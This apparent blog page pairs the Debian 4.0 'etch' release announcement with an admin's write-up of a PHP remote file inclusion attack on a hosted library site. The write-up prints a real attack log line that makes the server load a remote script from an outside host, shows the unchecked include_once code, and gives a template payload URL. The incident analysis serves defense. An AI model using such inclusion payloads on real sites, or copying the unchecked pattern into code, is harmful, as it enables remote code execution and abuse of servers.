Debian GNU/Linux 4.0 released

Debian Etch finally released on 8th April, 2007.
Here is the notice from [email protected].

Debian GNU/Linux 4.0 released

The Debian Project is pleased to announce the official release of Debian
GNU/Linux version 4.0, codenamed "etch", after 21 months of constant
development.  Debian GNU/Linux is a free operating system which supports
a total of eleven processor architectures and includes the KDE, GNOME
and Xfce desktop environments.  It also features cryptographic software
and compatibility with the FHS v2.3 and software developed for version
3.1 of the LSB.

Using a now fully integrated installation process, Debian GNU/Linux 4.0
comes with out-of-the-box support for encrypted partitions.  This
release introduces a newly developed graphical frontend to the
installation system supporting scripts using composed characters and
complex languages; the installation system for Debian GNU/Linux has now
been translated to 58 languages.

Also beginning with Debian GNU/Linux 4.0, the package management system
has been improved regarding security and efficiency.  Secure APT allows
the verification of the integrity of packages downloaded from a mirror.
Updated package indices won't be downloaded in their entirety, but
instead patched with smaller files containing only differences from
earlier versions.

Debian GNU/Linux runs on computers ranging from palmtops and handheld
systems to supercomputers, and on nearly everything in between.  A total
of eleven architectures are supported including:  Sun SPARC (sparc), HP
Alpha (alpha), Motorola/IBM PowerPC (powerpc), Intel IA-32 (i386) and
IA-64 (ia64), HP PA-RISC (hppa), MIPS (mips, mipsel), ARM (arm), IBM
S/390 (s390) and -- newly introduced with Debian GNU/Linux 4.0 -- AMD64
and Intel EM64T (amd64).

Debian GNU/Linux can be installed from various installation media such
as DVDs, CDs, USB sticks and floppies, or from the network.  GNOME is
the default desktop environment and is contained on the first CD.  The K
Desktop Environment (KDE) and the Xfce desktop can be installed through
two new alternative CD images.  Also newly available with Debian
GNU/Linux 4.0 are multi-arch CDs and DVDs supporting installation of
multiple architectures from a single disc.

Debian GNU/Linux can be downloaded right now via bittorent (the
recommended way), jigdo or HTTP;  see <http://www.debian.org/CD/> for
further information.  It will soon be available on DVD and CD-ROM from
numerous vendors <http://www.debian.org/CD/vendors/>, too.

This release includes a number of updated software packages, such as the
K Desktop Environment 3.5 (KDE), an updated version of the GNOME desktop
environment 2.14, the Xfce 4.4 desktop environment, the GNUstep desktop
5.2, X.Org 7.1, OpenOffice.org 2.0.4a, GIMP 2.2.13, Iceweasel (an
unbranded version of Mozilla Firefox 2.0.0.3), Icedove (an unbranded
version of Mozilla Thunderbird 1.5), Iceape (an unbranded version of
Mozilla Seamonkey 1.0.8), PostgreSQL 8.1.8, MySQL 5.0.32, GNU Compiler
Collection 4.1.1, Linux kernel version 2.6.18, Apache 2.2.3, Samba
3.0.24, Python 2.4.4 and 2.5, Perl 5.8.8, PHP 4.4.4 and 5.2.0, Asterisk
1.2.13, and more than 18,000 other ready to use software packages.

Upgrades to Debian GNU/Linux 4.0 from the previous release, Debian
GNU/Linux 3.1 codenamed "sarge", are automatically handled by the
aptitude package management tool for most configurations, and to a
certain degree also by the apt-get package management tool.  As always,
Debian GNU/Linux systems can be upgraded quite painlessly, in place,
without any forced downtime, but it is strongly recommended to read the
release notes for possible issues.  For detailed instructions about
installing and upgrading Debian GNU/Linux, please see the release notes
<http://www.debian.org/releases/etch/releasenotes>.  Please note that
the release notes will be further improved and translated to additional
languages in the coming weeks.

About Debian
------------

Debian GNU/Linux is a free operating system, developed by more than
a thousand volunteers from all over the world who collaborate via the
Internet.  Debian's dedication to Free Software, its non-profit nature,
and its open development model make it unique among GNU/Linux
distributions.

The Debian project's key strengths are its volunteer base, its dedication
to the Debian Social Contract, and its commitment to provide the best
operating system possible.  Debian 4.0 is another important step in that
direction.

Contact Information
-------------------

For further information, please visit the Debian web pages at
<http://www.debian.org/> or send mail to <[email protected]>.

Security Issue in PHP – include_once

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...

The problem is that the $pagename does not have any gruad to check the value that got by $_Get[‘name’].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.